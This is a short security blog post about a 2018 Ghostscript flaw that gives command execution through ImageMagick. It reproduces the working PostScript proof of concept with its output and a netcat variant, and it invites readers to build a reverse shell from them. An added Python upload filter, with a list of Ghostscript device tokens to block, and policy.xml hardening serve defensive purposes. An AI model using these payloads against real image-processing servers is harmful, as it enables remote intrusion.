ImageMagick RCE

Numb Shiva
Aug 22, 2018 · 1 min read

Overnight @taviso dropped a few vulnerabilities in Ghostscript, including one that gives code execution in ImageMagick.

Link to the bug report in Project Zero.

ImageMagick is not shy when it comes to the number of vulnerabilities disclosed, with over 40 in 2018, and who can forget the marketing around ‘ImageTragick’?

The ImageMagick code execution caught my eye, mostly because ImageMagick is widely used on web servers, the bug seemed fairly trivial to exploit, and it seemed to show the most promise for turning into a remote code execution.

The PoC provided by Tavis is fairly easy to break down, with the last line responsible for executing the command (Ubuntu PoC):

$ cat shellexec.jpeg
%!PS
userdict /setpagedevice undef
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

Running convert on the above file will execute the ‘id’ command, returning the id of the user that ran convert. The .jpeg extension is irrelevant: ImageMagick identifies input by content, sees the %!PS header and hands the file to Ghostscript through its PostScript delegate, and Ghostscript’s %pipe% pseudo-device “opens” the OutputFile by running whatever follows the prefix as a shell command.

$ convert shellexec.jpeg blah.gif
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)

Quick and nasty testing showed that this could indeed be used to force a system to connect to another machine:

mark /OutputFile (%pipe%echo `id` | nc localhost 1337) currentdevice putdeviceprops

With a listener waiting on the other end (the connection lands on localhost in this test, so that is the host used in the payload above):

$ nc -lvvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from localhost 55068 received!
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)

Success! Command execution through to a ‘remote’ system. Modify payloads accordingly and you’ll have a ‘proper’ reverse shell ;)
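As an added example that is not part of the original post (and not Tavis’s, Ghostscript’s or ImageMagick’s code), here is a Python pre-filter for the upload-then-convert pipeline that both the ‘id’ payload and the netcat payload above abuse. It makes the security point concrete: both files are named .jpeg yet begin with a PostScript header, and the header, not the name, is what ImageMagick keys on when it picks a delegate. So the filter checks real magic bytes against the declared extension, refuses anything in the PostScript/PDF family outright, and scans the whole blob for Ghostscript device tokens as defence in depth. The signature tables, the check_upload() function and every sample file (the PoC, its netcat variant, a JPEG stub, a PNG stub and a JPEG/PostScript polyglot) are constructed for this demonstration.

```python
import os

# Magic bytes of the raster formats we are willing to hand to ImageMagick.
RASTER_MAGIC = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Which declared extensions are allowed for each whitelisted format.
EXT_TO_FORMAT = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif"}

# Leading bytes that make ImageMagick route a file to its Ghostscript delegate:
# "%!" (PS/EPS), "%PDF-" (PDF) and the DOS EPS binary header.
PS_FAMILY_MAGIC = (b"%!", b"%PDF-", b"\xc5\xd0\xd3\xc6")

# Ghostscript device plumbing that has no business inside a picture. Scanning the
# whole blob for these is defence in depth against payloads hidden after a valid header.
SUSPICIOUS_TOKENS = (b"%pipe%", b"/OutputFile", b"currentdevice", b"putdeviceprops")


def sniff_format(data):
    """Return the whitelisted raster format the leading bytes identify, or None."""
    for fmt, signatures in RASTER_MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return fmt
    return None


def check_upload(filename, data):
    """Decide whether `data`, uploaded as `filename`, may be passed to `convert`.

    Returns (accepted, reason). The PostScript-family check runs first so the
    reason names the actual problem even when the extension also mismatches.
    """
    if data.startswith(PS_FAMILY_MAGIC):
        return False, "PostScript/PDF header: ImageMagick would hand this to Ghostscript"
    for token in SUSPICIOUS_TOKENS:
        if token in data:
            return False, "Ghostscript device token %s in image data" % token.decode()
    fmt = sniff_format(data)
    if fmt is None:
        return False, "magic bytes do not match an allowed raster format"
    ext = os.path.splitext(filename)[1].lower()
    if EXT_TO_FORMAT.get(ext) != fmt:
        return False, "extension %s does not match content (%s)" % (ext or "(none)", fmt)
    return True, fmt


# Constructed samples. SHELLEXEC_JPEG mirrors the page's PoC; REVERSE_JPEG is its
# netcat variant; the JPEG and PNG stubs carry only enough header to be recognised.
SHELLEXEC_JPEG = (
    b"%!PS\n"
    b"userdict /setpagedevice undef\n"
    b"{ null restore } stopped { pop } if\n"
    b"{ legal } stopped { pop } if\n"
    b"mark /OutputFile (%pipe%id) currentdevice putdeviceprops\n"
)
REVERSE_JPEG = SHELLEXEC_JPEG.replace(b"%pipe%id", b"%pipe%echo `id` | nc localhost 1337")
BENIGN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"\x00" * 32
PNG_AS_JPG = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"\x00" * 32
POLYGLOT_JPEG = BENIGN_JPEG + SHELLEXEC_JPEG  # valid JPEG magic, PostScript appended

SAMPLES = [
    ("shellexec.jpeg", SHELLEXEC_JPEG),
    ("reverse.jpeg", REVERSE_JPEG),
    ("photo.jpg", BENIGN_JPEG),
    ("photo.jpg", PNG_AS_JPG),
    ("poly.jpg", POLYGLOT_JPEG),
]


def main():
    for name, blob in SAMPLES:
        accepted, reason = check_upload(name, blob)
        print("%-15s %s: %s" % (name, "ACCEPT" if accepted else "REJECT", reason))


if __name__ == "__main__":
    main()
```

Both .jpeg PoCs are rejected on the header check before anything else looks at them, the PNG-renamed-to-.jpg is rejected on the extension mismatch, and the polyglot is caught by the token scan even though its magic bytes are a legitimate JPEG. Treat a filter like this as a stopgap for an upload pipeline, not a fix: the fix is the patched Ghostscript, and on the ImageMagick side the usual hardening is to deny the PS, PS2, PS3, EPS, PDF and XPS coders in policy.xml (one line of the form <policy domain="coder" rights="none" pattern="PS" /> per coder), so that content sniffing can never reach the delegate in the first place.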

Happy hacking.
